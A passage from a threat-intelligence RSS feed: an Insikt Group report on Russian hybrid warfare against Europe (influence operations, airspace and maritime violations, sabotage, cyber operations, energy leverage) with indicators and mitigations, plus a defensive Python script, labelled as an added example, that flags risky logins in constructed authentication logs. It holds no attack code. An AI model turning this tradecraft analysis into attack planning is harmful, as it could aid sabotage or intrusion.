        <p>Russian influence efforts have also leveraged illicit financing and alleged bribery to attempt to favorably reshape European politics. For example, in spring 2024, Czech authorities <a href="https://www.politico.eu/article/czech-republic-russia-influence-voice-of-europe/">accused</a> the Voice of Europe, an organization linked to Viktor Medvedchuk, of paying politicians in several EU countries to spread anti-Ukraine messages. In September and October 2024, Moldovan police <a href="https://www.reuters.com/world/europe/moldova-says-russia-linked-network-tried-buy-votes-2024-10-04/">reported</a> that a Russia-linked network, allegedly run by fugitive oligarch Ilan Shor, channeled tens of millions of dollars to buy votes ahead of Moldova’s October 20, 2024, presidential election and EU referendum. In December 2024, Romanian prosecutors <a href="https://www.reuters.com/world/europe/romania-probes-alleged-russian-linked-campaign-financing-tiktok-2024-12-06/">conducted</a> raids and opened probes into alleged illegal campaign financing and payments to TikTok users and influencers associated with the then-annulled presidential vote. More recently, former UK Member of the European Parliament (MEP) Nathan Gill was <a href="https://www.reuters.com/world/uk/former-uk-mep-jailed-accepting-bribes-linked-russia-2025-11-21/">sentenced</a> on November 21, 2025, after pleading guilty to accepting bribes to make pro-Russian statements.</p>
        <p>Insikt Group assesses Russia’s NGW against Europe will likely consist of aggressive influence operations targeting Europe that aim to erode European unity and advance Russia’s quest for a multipolar world order. NGW will very likely continue supporting Moscow’s core objectives of eroding political and public support for Ukrainian sovereignty and assistance to Kyiv, accelerating sanctions fatigue, and exploiting domestic political crises and election cycles to fracture European cohesiveness and transatlantic cooperation. Moscow will likely expand its reliance on access to third parties and intermediaries, including sympathetic socio-political organizations and fringe movements, to launder Kremlin-aligned messages into the European information environment.</p>
        <p>Across Europe, Russia will almost certainly continue to attempt to delegitimize existing democratic institutions and Europe’s information ecosystem by continuing to foster distrust in elections, mainstream media, the EU, and pro-European government figures. In a post-war environment, assuming European sanctions on Russian media enterprises are lifted, Russia will very likely attempt to reestablish its state media presence while also hardening itself to withstand future disruptions, legal restrictions, and platform or government takedowns in the event of a kinetic conflict with Europe.</p>
        <p>New Generation Warfare operations against Europe will very likely incorporate much of Russia’s current-era influence tradecraft, including social media influence via human and automated networks, media impersonation and covert media outlet brands, illicit financing and bribery, and cyber-enabled influence such as hack-and-leak narratives. Further, Insikt Group assesses Moscow will very likely continue attempting to cultivate sympathetic allies through covertly funded fringe socio-political organizations, using these entities to astroturf “grassroots” support, amplify Kremlin-aligned narratives, and catalyze or intensify domestic unrest across Europe. We assess that Russia will also adapt emerging technologies, particularly AI, to scale the production, localization, and quality of influence content, increase dissemination efficiency, and optimize targeting. Continued advances in generative AI will almost certainly improve the realism of propaganda images and fabricated reporting, forged documents and correspondence, and synthetic impersonations of public figures, including audio and video deepfakes.</p>
        <h3>Airspace Incursions by Drones and Jets</h3>
        <p>Beginning in September 2025, suspected violations of NATO airspace by Russia-directed drone operators or Russian jets increased to unprecedented levels, as Russia likely sought to project power across NATO territory and test NATO resolve while maintaining plausible deniability. Insikt Group tracked 30 suspected or confirmed violations between September 2025 and January 2026, compared to 23 suspected or confirmed violations between March 2022 and August 2025. The most commonly targeted countries since March 2022 have been Poland and Romania; however, suspected Russian violations of NATO airspace have occurred outside of Russia’s historic sphere of influence, including in Germany, the UK, Denmark, and Norway. Violations have most frequently targeted critical infrastructure, such as military bases and airports.</p>
        <p>In a full-scale New Generation Warfare-like campaign in Europe, Russia likely would escalate the frequency and level of aggressiveness of these violations. Russia’s targeting would likely continue to focus on critical infrastructure, but violations would very likely significantly increase in frequency. Russia would also likely use drones to fly closer to targets and perhaps hover over them for extended periods of time, in a likely effort to test NATO’s willingness to shoot down drones and perhaps collect intelligence on critical infrastructure facilities. Indeed, in September 2025, Polish authorities said they <a href="https://www.bbc.com/news/articles/c147065pzdzo">shot</a> down Russian drones that violated Poland’s airspace.</p>
        <p>Other ways Russia would likely escalate the aggressiveness of its airspace violations include timing those violations with major NATO events, such as military exercises and summits. Russia could escalate its use of drones as electronic warfare mechanisms, perhaps to disrupt NATO military exercises or the functioning of critical infrastructure facilities.</p>
        <p>Russia would likely also use its drones to amplify its psychological warfare as a way of projecting power and demonstrating to the public that Moscow can disrupt everyday life in NATO countries. Russia could do this via tactics such as hovering drones over civilian transportation infrastructure, like railways or airports, which have already been <a href="https://www.cbsnews.com/news/drones-europe-nato-airports-russia-hybrid-warfare-belgium-uk-anti-drone-troops/">forced</a> to temporarily close. Russia could also launch drones over facilities hosting political summits, such as the annual NATO Summit, or over polling places during elections to stoke public fear. In a full-scale NGW campaign that involves coordination of multiple tactics, Russian propaganda outlets might release footage of these incidents to propagate a narrative that NATO states cannot protect their infrastructure. Russia could also combine drone or jet violations with sabotage operations to further sow public panic and force NATO governments into a defensive posture.</p>
        <p>Russia would very likely seek to maintain some level of deniability and would avoid airstrikes and mass casualty events, which would almost certainly guarantee an Article 5 declaration.</p>
        <h3>Territorial Waters Violations and Targeting of Undersea Cables</h3>
        <p>Insikt Group assesses that, since February 2022, Russia has increasingly used violations of NATO states’ territorial waters<sup>4</sup> and targeting of undersea cables to test the alliance’s resilience, collect intelligence, keep NATO in a reactive, defensive posture, and attempt to deter NATO from undermining Russian strategic interests. In June 2023, Deputy Chairman of the Security Council Dmitriy Medvedev <a href="https://www.reuters.com/world/europe/russias-medvedev-says-moscow-now-has-free-hand-destroy-enemies-undersea-2023-06-14/">stated</a> that, “if we proceed from the proven complicity of Western countries in blowing up the Nord Streams, then we have no constraints — even moral — left to prevent us from destroying the ocean-floor cable communications of our enemies.” Medvedev’s comments were likely purposefully hyperbolic; however, they likely reflect a Kremlin perception that NATO is targeting Russian strategic interests, thereby justifying retaliatory action.</p>
        <p>Examples of Russia likely targeting undersea cables and maritime assets include an April 2025 incident in which the UK <a href="https://www.thetimes.com/uk/defence/article/russia-secret-war-uk-waters-submarines-dpbzphfx5">identified</a> Russian sensors attempting to collect intelligence on UK nuclear submarines and other underwater critical infrastructure; the Russian Yantar surveillance ship <a href="https://www.theguardian.com/world/2024/nov/16/russian-spy-ship-escorted-away-from-internet-cables-in-irish-sea">sailing</a> near cables carrying data for Google and Microsoft under the Irish Sea in November 2024; and reports suggesting that the Russian Eagle S ship accused of damaging multiple undersea cables in December 2024 <a href="https://www.lloydslist.com/LL1151955/Russia-linked-cable-cutting-tanker-seized-by-Finland-was-loaded-with-spying-equipment">carried</a> spy equipment to monitor naval activity.</p>
        <p>Russian ships have also violated NATO states’ territorial waters, likely to test NATO resilience, force NATO into a defensive posture, and project power. Examples include a July 2025 incident in which a Russian border guard vessel <a href="https://news.err.ee/1609755954/russian-border-guard-vessel-violates-estonia-s-maritime-border">entered</a> Estonian territorial waters without permission; a July 2024 incident in which a Russian naval vessel <a href="https://www.rferl.org/a/finland-russia-vessel-border-guard-territorial-waters/33052301.html?utm_source=chatgpt.com">entered</a> Finnish territorial waters without authorization; and frequent <a href="https://apnews.com/article/nato-russia-shadow-fleet-jets-ukraine-sanctions-oil-revenue-5e74109e5b1d84dc73ac2592068d4689">encounters</a> between NATO states and Russia-linked “shadow fleet” vessels. These vessels are tankers sailing under other flags, which often refuse inspection or orders from local navies.</p>
        <p>During a full-scale New Generation Warfare campaign against NATO, Russia likely would escalate its targeting of undersea cables and violations of territorial waters. This could include more frequent cable targeting, likely to cause minor but persistent damage to undersea critical infrastructure that tests NATO resilience and Russian destructive capabilities without provoking an Article 5 declaration. Russia could also conduct electronic jamming operations during cable repairs to inhibit communications and use Russian ships to harass those conducting repairs.</p>
        <p>Russia would also likely attempt longer and more provocative territorial waters violations, including placing Russian ships near NATO vessels and expanding these activities into areas such as the Mediterranean; conducting concurrent hybrid activity such as GPS jamming and automatic identification system (AIS) spoofing; refusing escort out of territorial waters; and combining territorial waters violations with airspace violations by Russian aircraft or targeting of undersea infrastructure.</p>
        <p>Russia would likely aim to overwhelm NATO’s existing efforts to prevent sabotage of undersea infrastructure. In January 2025, Allied Joint Force Command Brunssum (JFCBS) <a href="https://shape.nato.int/operations/operations-and-missions/baltic-sentry">launched</a> Baltic Sentry — a campaign that uses tools such as frigates, maritime patrol assets, and naval drones to deter sabotage of undersea infrastructure. Since the launch of Baltic Sentry, the Baltic Sea has <a href="https://www.atlanticcouncil.org/in-depth-research-reports/issue-brief/how-the-baltic-sea-nations-have-tackled-suspicious-cable-cuts/">experienced</a> very few undersea sabotage efforts; however, it is not clear whether this is the result of Baltic Sentry or a lack of planned operations.</p>
        <h3>Sabotage Operations</h3>
<p>We assess Russia has escalated its use of sabotage operations in NATO territory since its full-scale invasion of Ukraine in 2022, likely to test the resilience of NATO states’ critical infrastructure in particular; propagate a narrative that Western states cannot protect their populations from threats; harm NATO’s ability to collectively respond to Russian aggression by forcing NATO into a reactive, defensive posture; and degrade NATO states’ ability to provide material support to Ukraine. Sabotage operations are loosely defined, but typically <a href="https://www.rferl.org/a/parcels-exploded-russian-plot/33189080.html">consist</a> of physical attacks on <a href="https://apnews.com/article/lithuania-russia-intelligence-arson-attack-ikea-vilnius-b7f915c6376c0711b852657d17a30c0d">civilian</a> or dual-use <a href="https://foreignpolicy.com/2024/07/26/russia-sabotage-poison-finland-water-treatment/">infrastructure</a> carried out by deniable actors.</p>
<p>Particularly since 2022, Russia-linked entities have focused sabotage operations on critical infrastructure in NATO states, exploiting weaknesses stemming from <a href="https://www.fme.nl/system/files/publicaties/2023-12/rapport%20infra%20maintenance%20EU%20%2B%20intro.pdf">deferred</a> maintenance and insufficient public or private <a href="https://www.visualcapitalist.com/sp/charted-europes-2-trillion-infrastructure-investment-deficit-gxeu01/">investment</a> in upkeep. Within critical infrastructure, the most frequently <a href="https://www.iiss.org/research-paper/2025/08/the-scale-of-russian--sabotage-operations--against-europes-critical--infrastructure/">targeted</a> sectors include undersea telecommunication and power cables; water supply and distribution; transportation; military; healthcare; and telecommunications. The number of Russian sabotage operations quadrupled from 2023 to 2024, and 2025 likely saw levels consistent with 2024. Operations have occurred across NATO, rather than being concentrated in Russia’s historic sphere of influence. That said, the most commonly <a href="https://www.iiss.org/research-paper/2025/08/the-scale-of-russian--sabotage-operations--against-europes-critical--infrastructure/">targeted</a> states between January 2018 and June 2025 were Germany, Estonia, Latvia, Lithuania, and Poland.</p>
        <p>In a New Generation Warfare-like campaign targeting NATO territory, Moscow would likely move from what we assess has thus far been largely opportunistic sabotage to operations with more consistency and geographic breadth, and that complement other tactics.</p>
        <p>Russia would likely still focus its sabotage operations on critical infrastructure, but would likely place a premium on damaging the critical infrastructure of NATO states that either would be probable targets of a Russian military incursion — such as Poland or the Baltic states — or would lend significant assistance to those states, such as the UK, Germany, or France. This is because in an NGW campaign, Russia would likely view sabotage operations as, in part, a way to test the resilience of potential victim states and their allies. Russia’s sabotage operations against those targets would likely be more frequent and could coincide with significant events such as elections or military exercises. Russia would likely pair sabotage operations with other tactics, such as offensive cyber operations or airspace violations, to augment the destructive impact of the operations and try to strain NATO states’ capacity by forcing them to respond to multiple disruptions at once, while still staying below the threshold that would risk an Article 5 declaration.</p>
        <h3>Offensive Cyber Operations for Disruption and Counterintelligence</h3>
        <p>Russian cyber activity directed at European targets has consistently emphasized access-oriented operations, including attacks on internet-facing firewalls, virtual private networks (VPNs), email services, and web portals. This activity aligns with documented Russian cyber practices focused on enabling intelligence collection, operational reach, and long-term flexibility rather than immediate disruptive effects. Recent Insikt Group reporting highlights BlueEcho activity targeting perimeter infrastructure to establish footholds and enable follow-on credential capture and lateral movement, while BlueDelta campaigns demonstrate sustained credential harvesting at scale using impersonated Microsoft Outlook Web App (OWA), Sophos VPN, and Google login workflows. This tradecraft is low-cost, repeatable, and consistent with long-term counterintelligence targeting of government, defense, and research entities.</p>
        <p>Russian cyber activity affecting Europe has been broad in scope, with targeting observed across <a href="https://www.recordedfuture.com/ko/research/gru-linked-bluedelta-evolves-credential-harvesting">multiple regions and sectors</a>. If cyber operations were used for more overtly disruptive purposes, effects would likely be more pronounced in states with weaker cybersecurity maturity or slower coordinated response mechanisms, such as fragmented local-government IT environments or limited national incident response surge capacity. This does not preclude activity against major NATO states, where Russian cyber operations have historically focused more heavily on intelligence collection and access. BlueDelta’s targeting of NATO-aligned and defense-related organizations reflects continued Russian interest in strategically valuable European targets aligned with GRU intelligence requirements.</p>
        <p>Observed Russian cyber activity also provides insight into how operations could escalate if strategic conditions were to change and Russia were to launch a full-scale NGW campaign. Russian threat actors have demonstrated the ability to establish and maintain access over time, including through persistent connections and tunneling, which could be repurposed to degrade remote access services, manipulate edge-device configurations, or cause temporary service disruption. In Ukraine, cyber activity has been observed alongside influence operations and physical sabotage, including Recorded Future–tracked influence campaigns such as <a href="https://www.recordedfuture.com/ko/research/copycop-deepens-its-playbook-with-new-websites-and-targets">CopyCop</a>, which leveraged automated content replication and spoofed media infrastructure to amplify pro-Russian narratives in parallel with other forms of hybrid activity. If applied elsewhere, similar coordination could increase pressure on incident response capabilities and undermine public confidence in the reliability of essential services. Credential-harvesting operations further provide pathways beyond inbox access, including potential compromise of identity providers, VPN portals, and privileged administrative portals.</p>
        <p>Russian cyber operations have historically involved establishing and maintaining access to targeted networks over extended periods, a pattern also <a href="https://www.security.com/blog-post/ukraine-russia-attacks">documented</a> in prior campaigns in Ukraine. However, there is no public evidence demonstrating that the access currently observed in European networks is intended for future disruptive operations. If a kinetic conflict were to escalate in Europe, Russia would likely seek to expand or prioritize access within relevant networks to support intelligence collection, operational coordination, or potential disruption. Russia also has a <a href="https://www.recordedfuture.com/ko/research/dark-covenant-3-controlled-impunity-and-russias-cybercriminals">documented</a> history of tolerating or leveraging cybercriminal activity alongside state-directed operations, including overlap with criminal infrastructure and access brokers, which may allow operators to expand scale, complicate attribution, and generate disruptive effects without overtly exposing state-linked capabilities. Collectively, activity associated with BlueAlpha, BlueDelta, BlueEcho, Sandworm, and Dragonfly illustrates Russia’s ability to scale cyber operations from access and intelligence collection toward disruption if strategic conditions were to change, consistent with broader hybrid and New Generation Warfare practices.</p>
        <h3>Exploitation of European Dependence on Russian Oil and Natural Gas</h3>
        <p>Russia has long exploited other states’ dependence on its natural gas and oil to exercise leverage over them, typically by strategically <a href="https://www.reuters.com/world/poland-bulgaria-face-russian-gas-cut-ukraine-crisis-escalates-2022-04-26/">decreasing</a> supply flows, particularly during high-demand periods, such as winter. For example, in 2006, Georgia <a href="https://www.rferl.org/a/1064976.html">accused</a> Russia of intentionally cutting gas supplies during an unusually cold period to increase political pressure on Tbilisi. In the run-up to Russia’s full-scale invasion of Ukraine in February 2022, Russian state gas company Gazprom <a href="https://www.reuters.com/world/europe/gazprom-cuts-gas-flows-europe-ukraine-tensions-2021-10-06/">reduced</a> natural gas deliveries to Europe, likely in an effort to pressure Europe into abandoning a unified stance on supporting Ukraine.</p>
        <p>Since 2022, many NATO states have sought to <a href="https://gasoutlook.com/analysis/europe-breaks-with-russian-gas-but-still-depends-on-the-u-s/">reduce</a> their dependence on Russian natural gas and oil; however, several states remain dependent, including <a href="https://pism.pl/publications/slovakia-remains-dependent-on-russian-energy">Slovakia, Hungary, and Türkiye</a>. In a full-scale New Generation Warfare campaign in Europe, Russia would very likely escalate its exploitation of those states’ dependence on Russian energy imports to demonstrate Moscow’s ability to degrade European critical infrastructure, undermine NATO unity, gauge the resilience of these states’ critical infrastructure, and test Russia’s ability to handicap critical infrastructure, should Putin decide to launch a military incursion into NATO territory.</p>
        <p>Moscow’s willingness to exploit these states’ dependence on Russian energy likely varies by state. Moscow is less likely to exploit Hungary’s dependence on Russian oil and gas, given Budapest’s <a href="https://www.bbc.com/news/articles/c058lny3pdqo">strong</a> relations with Russia. Slovakia is a more likely target, as it seeks a <a href="https://www.reuters.com/business/energy/slovakia-wants-normalise-relations-with-russia-ramping-up-gas-imports-pm-fico-2025-09-02/">positive</a> relationship with Moscow, but is likely of less strategic importance to Russia than Hungary. Moscow’s relations with Türkiye have <a href="https://carnegieendowment.org/research/2024/10/understanding-turkiyes-entanglement-with-russia">fluctuated</a> between positive and adversarial; the likelihood of exploiting Türkiye’s dependence on Russian energy imports would likely depend, in part, on how positive the overall Russia-Türkiye relationship is at that time.</p>
<p>Escalated exploitation of energy dependence would likely take the form of both more frequent and more geographically broad supply disruptions, particularly during high-demand periods such as the winter and perhaps during NATO military exercises or elections. Russia could also escalate its use of pricing manipulation to punish states that work against Russia’s strategic priorities in Ukraine, and reward pro-Russia states such as Hungary.</p>
        <p>Russia would also likely combine supply cuts with sabotage operations. For example, in 2006, Moscow <a href="https://www.reuters.com/article/world/georgia-hit-by-gas-cut-and-power-line-blast-idUSL08601420060122/">cut</a> gas supplies in Georgia at the same time it sabotaged an electricity line. Following a successful operation, pro-Russia propaganda outlets would likely amplify narratives that claim European critical infrastructure is weak and vulnerable, and that this demonstrates the inadequacy of democracy and the Western political system writ large at fulfilling basic public needs.</p>
        <p>In a New Generation Warfare campaign against Europe, Russia would be unlikely to seek permanent damage to European critical infrastructure or mass civilian harm from disruption of energy flows. Russia would also likely avoid long-term disruption of oil and gas deliveries to limit the financial impact, since oil and gas revenues <a href="https://www.reuters.com/business/energy/russias-oil-gas-budget-revenue-set-sink-46-january-reuters-calculations-show-2026-01-19/#:~:text=Summary,the%20same%20month%20in%202024.">comprise</a> roughly 25% of Russia’s annual federal revenue.</p>
        <h2>Indicators of NGW Campaign in Europe, Implications for Public and Private Sectors, and Recommended Mitigations</h2>
        <h3>Tactic: Influence Operations</h3>
        <h4>Indicators of NGW Campaign</h4>
        <ul>
          <li>Increased convergence of narratives across propaganda outlets, including state media, inauthentic social media accounts, and so on</li>
          <li>Parallel narratives tailored to each country or region</li>
        </ul>
        <h4>Implications for Public and Private Sectors</h4>
        <ul>
          <li><strong>Public Sector:</strong> more pronounced political polarization; reduced public trust in government competence</li>
          <li><strong>Private Sector:</strong> brand damage if firms are targeted in influence operation (IO) campaigns; employee or executive harassment or doxxing</li>
        </ul>
        <h4>Recommended Mitigations</h4>
        <ul>
          <li>Ensure communication response protocols are in place, such as rapid rebuttal measures</li>
          <li>Ensure information environment monitoring is attuned to Russia-nexus narratives so inauthentic behavior can be detected quickly</li>
        </ul>
        <h3>Tactic: Airspace Incursions by Drones and Jets</h3>
        <h4>Indicators of an NGW Campaign</h4>
        <ul>
          <li>More frequent incursions that last longer and target strategic sites such as military training grounds, critical infrastructure nodes, and so on</li>
          <li>Incursions are conducted at lower altitudes, with transponders turned off</li>
          <li>Violations are clustered around NATO decisions or major military exercises</li>
        </ul>
        <h4>Implications for Public and Private Sectors</h4>
        <ul>
<li><strong>Public:</strong> forced closures of critical infrastructure sites during airspace violations, disrupting operations; likely escalation of public alarm and a potential decrease in public confidence in the government’s ability to keep critical infrastructure safe</li>
          <li><strong>Private:</strong> business operation disruptions due to critical infrastructure closures</li>
        </ul>
        <h4>Recommended Mitigations</h4>
        <ul>
          <li>Strengthen counter-measures against unmanned aircraft systems (UASs) around critical sites</li>
          <li>Ensure joint civil-military air incident protocols are in place, including aviation alerts and Notice to Airmen (NOTAM) coordination</li>
          <li>Improve GPS resilience</li>
        </ul>
        <h3>Tactic: Territorial Waters Violations and Targeting of Undersea Cables</h3>
        <h4>Indicators of an NGW Campaign</h4>
        <ul>
          <li>More frequent territorial waters violations</li>
          <li>Violations by state-linked vessels</li>
<li>Non-compliance with escort or hails; risky maneuvering around NATO state vessels, perhaps to provoke collisions</li>
          <li>Increased loitering of suspicious vessels near cable routes and landing areas</li>
          <li>Repeated “anchor drag” incidents</li>
          <li>Interference with repair ships</li>
          <li>Simultaneous cyber activity against telecommunications and energy operators</li>
        </ul>
        <h4>Implications for Public and Private Sectors</h4>
        <ul>
          <li><strong>Public:</strong> intermittent communications degradation; potential harm to energy infrastructure</li>
          <li><strong>Private:</strong> major potential operational losses for telecommunications, finance, and other key sectors; potential increases in insurance costs for shipping companies, should territorial waters violations at ports become common</li>
        </ul>
        <h4>Recommended Mitigations</h4>
        <ul>
          <li>Consider mapping alternative sea routes in case primary routes are disrupted; consider rapid reroute contracts</li>
          <li>Ensure sufficient port and state coordination</li>
          <li>Ensure physical hardening at cable landing sites</li>
          <li>Expand Baltic Sentry efforts to other locations</li>
        </ul>
        <h3>Tactic: Sabotage Operations</h3>
        <h4>Indicators of an NGW Campaign</h4>
        <ul>
          <li>More frequent operations, including arson, vandalism, explosions, and rail disruptions</li>
          <li>Targeting of high-priority sites, such as military logistics hubs, defense suppliers, and so on</li>
          <li>Targeting of civilian sites, such as shopping malls or residential neighborhoods</li>
          <li>Concurrent operations in multiple geographic regions, suggesting intentional planning</li>
          <li>Combined sabotage operations and airspace or territorial waters violations</li>
        </ul>
        <h4>Implications for Public and Private Sectors</h4>
        <ul>
          <li><strong>Public:</strong> potential reduction in public confidence in government’s ability to protect critical infrastructure and residential areas; in the event of significant escalation in sabotage operations, emergency services could be strained</li>
          <li><strong>Private:</strong> facility damage or loss; threat to worker safety; supply chain interruption; business interruption; reputational liability</li>
        </ul>
        <h4>Recommended Mitigations</h4>
        <ul>
          <li>Expand insider threat and contractor vetting at critical infrastructure sites</li>
          <li>Ensure physical security measures are in place, including perimeter detection, anti-drone measures, camera coverage, and access control</li>
          <li>Enhance public-private partnerships, as most of the critical infrastructure NATO relies upon is commercially owned</li>
          <li>Ensure rapid liaison channels with law enforcement and intelligence services</li>
        </ul>
        <h3>Tactic: Offensive Cyber Operations</h3>
        <h4>Indicators of an NGW Campaign</h4>
        <ul>
          <li>Campaigns that target strategic pressure points, such as logistics and transportation hubs, defense supply chains, and local government entities</li>
          <li>Intrusion and distributed denial-of-service (DDoS) activity spikes at politically significant moments, including elections, military exercises, or geopolitical summits</li>
          <li>Campaigns that blend state and proxy activity, such as hacktivist DDoS campaigns that amplify Kremlin-aligned narratives</li>
          <li>Coupling of multiple tactics, such as cyber and influence operation hybrid campaigns</li>
        </ul>
        <h4>Implications for Public and Private Sectors</h4>
        <ul>
          <li><strong>Public:</strong> DDoS and ransomware campaigns can undermine public confidence in the reliability of institutions; compromise of government narratives can result in less public confidence in the truth of government messaging; even attempted election manipulation can reduce confidence in voting systems</li>
<li><strong>Private:</strong> elevated risk of disruption of key logistics, transport, rail, and aviation systems; hack-and-leak operations pose risk to reputation, personally identifiable information, and intellectual property; targeting of critical infrastructure can result in operational disruption</li>
        </ul>
        <h4>Recommended Mitigations</h4>
        <ul>
          <li>Enforce phishing-resistant multi-factor authentication</li>
          <li>Implement conditional network access based on geopolitical and risk factors</li>
          <li>Patch for commonly exploited software</li>
          <li>Reduce exposure (lock down admin portals; restrict by IP address; remove unused services)</li>
          <li>Use DDoS protection, autoscaling</li>
<li>Coordinate with the national computer emergency response team (CERT) or national cyber security centre (NCSC), as well as upstream providers; rehearse continuity plans</li>
          <li>Require multi-factor authentication (MFA) and logging parity from third-party providers; segment privileged access; monitor for abnormal remote management activity</li>
        </ul>
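<p>The credential-harvesting tradecraft described above (impersonated OWA, Sophos VPN and Google login flows) and the mitigations listed here reduce to a small set of checks that can be run over authentication events from edge devices and admin consoles: was a privileged session established with a relayable second factor, did it originate outside the conditional-access allow-list, and did an administrative console see a source IP never associated with that account. The following is an added example, not Recorded Future’s code; the newline-delimited JSON event format, the field names, the MFA method labels, the country allow-list and the sample events are all assumptions constructed for the example.</p>

```python
"""Conditional-access and admin-console checks over authentication events.

Added example, not Recorded Future's code. The newline-delimited JSON event
format, the field names, the MFA method labels, the country allow-list and the
sample events are assumptions constructed for the example.
"""
import json
from collections import defaultdict
from dataclasses import dataclass

# Authenticators treated as phishing-resistant (FIDO2/WebAuthn, smart-card
# certificate). OTP codes and push approvals can be relayed through an
# adversary-in-the-middle page impersonating OWA or a VPN portal, so they
# do not qualify.
PHISHING_RESISTANT = {"fido2", "webauthn", "smartcard"}

# Conditional access: countries from which privileged portals may be reached.
# Assumed for the example; a real policy is risk-weighted and maintained as
# conditions change.
ALLOWED_COUNTRIES = {"DE", "PL", "EE", "LV", "LT", "FR", "GB"}

# Perimeter services of the kind the report names as access targets.
PRIVILEGED_SERVICES = {"sophos_vpn", "owa", "fw_admin", "idp_admin"}
# Remote-management consoles where a session from a source IP never seen for
# that account is treated as abnormal.
ADMIN_CONSOLES = {"fw_admin", "idp_admin"}


@dataclass(frozen=True)
class Finding:
    user: str
    service: str
    src_ip: str
    reason: str


def parse_events(text):
    """Parse newline-delimited JSON events, skipping blank or malformed lines."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def build_baseline(events):
    """Map (user, service) to source IPs seen during a trusted historical window."""
    baseline = defaultdict(set)
    for ev in events:
        if ev.get("result") == "success":
            baseline[(ev["user"], ev["service"])].add(ev["src_ip"])
    return baseline


def evaluate(events, baseline):
    """Return one Finding per policy violation among successful logins."""
    findings = []
    for ev in events:
        if ev.get("result") != "success":
            continue  # failed attempts belong to spray/lockout logic, not here
        user, svc, ip = ev["user"], ev["service"], ev["src_ip"]
        if svc in PRIVILEGED_SERVICES and ev.get("mfa") not in PHISHING_RESISTANT:
            findings.append(Finding(user, svc, ip,
                                    "privileged login without phishing-resistant MFA"))
        if ev.get("country") not in ALLOWED_COUNTRIES:
            findings.append(Finding(user, svc, ip,
                                    "login from country outside the conditional-access allow-list"))
        if svc in ADMIN_CONSOLES and ip not in baseline.get((user, svc), set()):
            findings.append(Finding(user, svc, ip,
                                    "admin console session from source IP not in baseline"))
    return findings


# Constructed sample data (not real logs). IPs are from documentation ranges.
BASELINE_LOG = """
{"ts":"2026-03-01T08:00:00Z","user":"bob","service":"fw_admin","src_ip":"198.51.100.5","country":"DE","mfa":"fido2","result":"success"}
{"ts":"2026-03-01T08:05:00Z","user":"erin","service":"idp_admin","src_ip":"198.51.100.9","country":"PL","mfa":"webauthn","result":"success"}
"""

CURRENT_LOG = """
{"ts":"2026-04-02T07:58:00Z","user":"alice","service":"sophos_vpn","src_ip":"203.0.113.10","country":"DE","mfa":"totp","result":"success"}
{"ts":"2026-04-02T08:01:00Z","user":"bob","service":"fw_admin","src_ip":"203.0.113.77","country":"DE","mfa":"fido2","result":"success"}
{"ts":"2026-04-02T08:03:00Z","user":"carol","service":"owa","src_ip":"192.0.2.44","country":"BR","mfa":"fido2","result":"success"}
{"ts":"2026-04-02T08:04:00Z","user":"dave","service":"owa","src_ip":"192.0.2.45","country":"DE","mfa":"password","result":"failure"}
{"ts":"2026-04-02T08:06:00Z","user":"erin","service":"idp_admin","src_ip":"198.51.100.9","country":"PL","mfa":"webauthn","result":"success"}
"""


def run_sample():
    """Evaluate the constructed current log against the constructed baseline."""
    return evaluate(parse_events(CURRENT_LOG), build_baseline(parse_events(BASELINE_LOG)))


if __name__ == "__main__":
    for f in run_sample():
        print(f"{f.user:<6} {f.service:<10} {f.src_ip:<14} {f.reason}")
```

<p>The first finding is the one that matters for the BlueDelta pattern: a successful VPN login with a TOTP code is exactly what an impersonated Sophos VPN page yields after relaying the victim’s code, so it should be treated as a gap in the phishing-resistant MFA rollout rather than as noise. The baseline is built from a separate trusted window on purpose; building it from the same events being evaluated would let the first malicious session define normal.</p>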
        <h3>Tactic: Leveraging Economic Dependence</h3>
        <h4>Indicators of an NGW Campaign</h4>
        <ul>
          <li>Supply manipulation, including threats or actions to raise price volatility</li>
          <li>Exploitation of legal measures, including sudden contract disputes or claims of force majeure</li>
          <li>More frequent cessation of oil and gas supplies, especially during high-demand periods such as winter</li>
        </ul>
        <h4>Implications for Public and Private Sectors</h4>
        <ul>
          <li><strong>Public:</strong> higher energy bills and supply disruption, potentially leading to public dissatisfaction</li>
          <li><strong>Private:</strong> price shocks, supply uncertainty, costs related to resolving alleged contract disputes</li>
        </ul>
        <h4>Recommended Mitigations</h4>
        <ul>
          <li>Diversify suppliers and routes</li>
          <li>Ensure on-site backup generation where feasible</li>
        </ul>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/research/media_17cedbb65db54e421fed3abc0cc62f5ed6f6fa0aa.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[2025 Cloud Threat Hunting and Defense Landscape]]></title>
            <link>https://www.recordedfuture.com/ko/research/2025-cloud-threat-hunting-defense-landscape</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/research/2025-cloud-threat-hunting-defense-landscape</guid>
            <pubDate>Thu, 19 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Threat actors are doubling down on cloud infrastructure — exploiting misconfigurations, abusing native services, and pivoting through hybrid environments to maximize impact. See how attack patterns are evolving across exploitation, ransomware, credential abuse, and AI service targeting in this latest cloud threat roundup.]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
<p>Insikt Group continues to observe growth in the number and activity of threat actors leveraging and exploiting cloud infrastructure to broaden the set of victims they target and infect. Recent reporting across the observed incidents shows that cloud-focused threats are converging on a few consistent patterns, which serve as the main sections of this report:</p>
        <ul>
          <li>Exploitation and Misconfiguration</li>
          <li>Cloud Abuse</li>
          <li>Cloud Ransomware</li>
          <li>Credential Abuse, Account Takeover, and Unauthorized Access</li>
          <li>Third-Party Compromise</li>
        </ul>
        <p>Across cases, initial access frequently comes from vulnerable or misconfigured services exposed to the internet — including application delivery controllers, monitoring dashboards, email security gateways, and enterprise resource planning (ERP) platforms — as well as stolen or weakly governed credentials sourced from public leaks, compromised developer workstations, and socially engineered helpdesk workflows. Once inside a targeted environment, threat actors systematically pivot through hybrid identity and virtual private network (VPN) infrastructure, targeting directory-synchronized accounts, non-human and executive identities, and privileged cloud roles to gain tenant-wide administrative control.</p>
